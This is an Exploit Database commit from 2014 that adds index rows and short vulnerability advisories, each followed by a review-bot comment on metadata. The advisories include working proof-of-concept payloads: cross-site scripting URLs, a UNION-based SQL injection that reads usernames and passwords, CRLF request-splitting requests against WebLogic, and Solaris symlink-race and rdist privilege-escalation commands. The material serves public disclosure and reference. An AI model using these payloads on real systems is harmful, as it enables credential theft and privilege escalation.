Updated 08_12_2014

Offensive Security 2014-08-12 04:39:36 +00:00
parent b3b8cbd244
commit 77dff34f06
12 changed files with 150 additions and 0 deletions


@ -30872,6 +30872,8 @@ id,file,description,date,author,platform,type,port
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0
34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0
34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0 34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
@ -30881,6 +30883,7 @@ id,file,description,date,author,platform,type,port
34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0
34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection Vulnerability",2009-12-21,anonymous,php,webapps,0
34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0 34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0
34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
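Review bot: the added row for 34289 gives no product version ("Web Cocoon simpleCMS - 'show.php' SQL Injection Vulnerability"), while every neighbouring row in this hunk carries one (SimpNews 2.47.3, Yappa 3.1.2, pragmaMX 0.1.11). If the affected version is known, add it to the description; if it is not, say so in the advisory file so readers do not assume all versions are affected. The row also uses a " - " separator that the surrounding 2010-era rows do not, so pick one convention for the description column.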
@ -30899,3 +30902,11 @@ id,file,description,date,author,platform,type,port
34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23
34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0
34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80 34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80
34309,platforms/solaris/dos/34309.txt,"Oracle Solaris 'rdist' Local Privilege Escalation Vulnerability",2010-07-13,"Monarch Rich",solaris,dos,0
34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management <= 10.3.2 Cross Site Scripting Vulnerability",2010-07-13,Markot,multiple,remote,0
34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 'flar' Insecure Temporary File Creation Vulnerability",2010-07-12,"Frank Stuart",solaris,local,0
34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server <= 10.3.3 Encoded URL Remote Vulnerability",2010-07-13,"Timothy D. Morgan",multiple,remote,0
34313,platforms/solaris/local/34313.txt,"Oracle Solaris 'nfslogd' Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0
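Review bot: row 34309 is filed under platforms/solaris/dos/ with type `dos`, but its description reads "Oracle Solaris 'rdist' Local Privilege Escalation Vulnerability". The other Solaris rows added here (34311, 34313, 34314) use `solaris,local`; 34309 should match, and the file path should move with it. Rows 34311 and 34314 are registered as `.sh` although the files added later in this commit are session transcripts with prompts and prose, so `.txt` would describe them better.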


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41664/info
Juniper Networks SA2000 SSL VPN appliance is prone to a cross-site scripting vulnerability because the web interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Juniper Networks SA2000 running IVE OS 6.5R1 (Build 14599) are vulnerable; other models and versions may also be affected.
http://www.example.com/dana-na/auth/url_default/welcome.cgi?p=logout&c=37&u=</script><script>alert(1)</script>
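Review bot: the description never names the vulnerable parameter; the sample URL on the last line places the script in `u` of welcome.cgi, so state that in the text, since the index row only mentions 'welcome.cgi'. The record also gives the affected build (IVE OS 6.5R1, Build 14599) but no fixed release or vendor reference; add one if it exists so the entry is usable for patch verification.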

platforms/linux/dos/34278.txt Executable file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41475/info
LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users.
http://www.exploit-db.com/sploits/34278.tif
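Review bot: this is a plain-text advisory but it is committed as an executable file; drop the executable bit. The text also omits the affected version and the trigger, both of which appear only in the index row ("LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch"); copy them into the file so the record stands on its own. The sample is an external link to 34278.tif rather than a file in this commit, so the entry depends on that URL staying available.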

platforms/linux/dos/34279.txt Executable file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41477/info
LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users.
http://www.exploit-db.com/sploits/34279.tif
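Review bot: apart from the BID number and the sample link, this text is word for word the same as 34278.txt, so nothing in the file tells the two LibTIFF issues apart. Add the distinguishing detail from the index row (unknown tag, second-pass processing) to the description. The executable mode on a `.txt` file applies here as well.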


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41617/info
Oracle Business Process Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
This vulnerability affects the following supported versions:
5.7 MP3, 6.0 MP5, 10.3 MP2
http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script>
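Review bot: the affected versions listed here ("5.7 MP3, 6.0 MP5, 10.3 MP2") do not match the index row, which says "<= 10.3.2"; reconcile the two notations. The text should also name the `context` parameter of tips.jsp, which is where both sample URLs place the script. Both samples use port 8585 while the index row records port 0, and the `faces/faces/faces` path segment is repeated three times; confirm both are intended.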


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/41620/info
Oracle WebLogic Server is prone to a remote vulnerability.
The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.
This vulnerability affects the following supported versions:
7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3
The following example requests are available:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com
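Review bot: the description calls this only "a remote vulnerability" and never names the class, although both sample requests carry encoded CR/LF (%0d%0a) inside the request path, followed by a header line or a second request line. State that in the text so readers can match the entry against proxy logs and filter rules. The prerequisite sentence also reads as if 'Plugins for Apache, Sun and IIS web servers' were a privilege level, when the wording suggests it is the affected component; please reword.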


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41526/info
Web Cocoon simpleCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/content/post/show.php?id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show
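Review bot: no affected version is given anywhere in this file, and the index row has none either, so the entry cannot be used to decide whether a given install is exposed. Add the version if known. The description should also name the `id` parameter of show.php, which is where the sample URL carries the injected query.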


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41656/info
The Next Generation of Genealogy Sitebuilding is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The Next Generation of Genealogy Sitebuilding 7.1.2 is vulnerable.
http://www.example.com/searchform.php?msg="/><script>alert('XSS')</script>
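Review bot: the file states that version 7.1.2 is vulnerable, but the index row for 34315 omits the version; add it there so the two agree. The text should also name the `msg` parameter of searchform.php, which the sample URL uses.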

platforms/solaris/dos/34309.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/41612/info
Oracle Solaris is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
The following products are affected:
Solaris 10
OpenSolaris
/usr/bin/rdist -cDwh file_that_is_hardlink rlogin_host:LONG_STRING
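Review bot: the text describes a local privilege escalation to superuser, yet the file sits under platforms/solaris/dos/ and is committed as executable although it is a `.txt` advisory; move it to the local directory and clear the mode bit. The description also never says what rdist does wrong. The only hint is the command line with a hard-linked file and a LONG_STRING placeholder, so add one sentence on the cause and give Solaris release or patch levels instead of the bare "Solaris 10".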


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/41619/info
Oracle Solaris is prone to an insecure temporary file creation vulnerability.
A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.
Oracle Solaris 8, 9 and 10 are vulnerable.
$ x=0
$ while [ "$x" -le 30000 ];do
> ln -s /etc/important /tmp/.flash_filter_one_.$x
> x=$(expr "$x" + 1)
> done
Later, when root creates a flash archive with:
# flar create -n junk `pwd`/junk.flar
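Review bot: the record stops at the `flar create` command and never states what happens to /etc/important afterwards, so the impact claimed in the description is not shown. Add the resulting file listing or a sentence describing it. It would also help to say that the temporary name is predictable (`/tmp/.flash_filter_one_.` plus a number, per the loop), since that is the property an administrator needs to check for. The index registers this file as `.sh`, but it is a transcript with `$`, `>` and `#` prompts and a prose line, not a script.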


@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/41637/info
Oracle Solaris is prone to an insecure temporary file creation vulnerability.
A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.
This vulnerability affects the following supported versions:
8, 9, 10, OpenSolaris
nnDon't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid
-> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
-rw------- 1 root root 4 Dec 29 21:25 /etc/oops
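Review bot: the first transcript line starts with a stray "nn" before the prompt ("nnDon't Panic! # ls -dl /etc/oops"), and the `ls` output for /tmp/.nfslogd.pid is split so that "-> /etc/oops" sits on its own line. Both look like copy artefacts; clean them so the before and after listings read correctly. One sentence stating what the transcript shows would also help: /etc/oops does not exist before nfslogd runs as root and is a root-owned file afterwards.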


@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/41642/info
The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.
An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.
Solaris 9 and 10 are affected.
$ id
uid=101(fstuart) gid=14(sysadmin)
$ cd /tmp
$ x=0
$ while [ "$x" -ne 30000 ] ;do
> ln -s /etc/important /tmp/dummy.$x
> x=$(expr "$x" + 1)
> done
$ ls -dl /etc/important
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important
$ cat /etc/important
This is an important file!
EOF
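Review bot: the transcript shows the symlink setup and the contents of /etc/important beforehand, then ends at "EOF" without the Solaris Management Console step that triggers the overwrite or the state of the file afterwards. Add both, or describe them in the text, so the claimed impact is documented. The index registers this as 34314.sh, but the content includes command output (`id`, `ls`, `cat`) and prompts, so it is not a runnable script; `.txt` fits better.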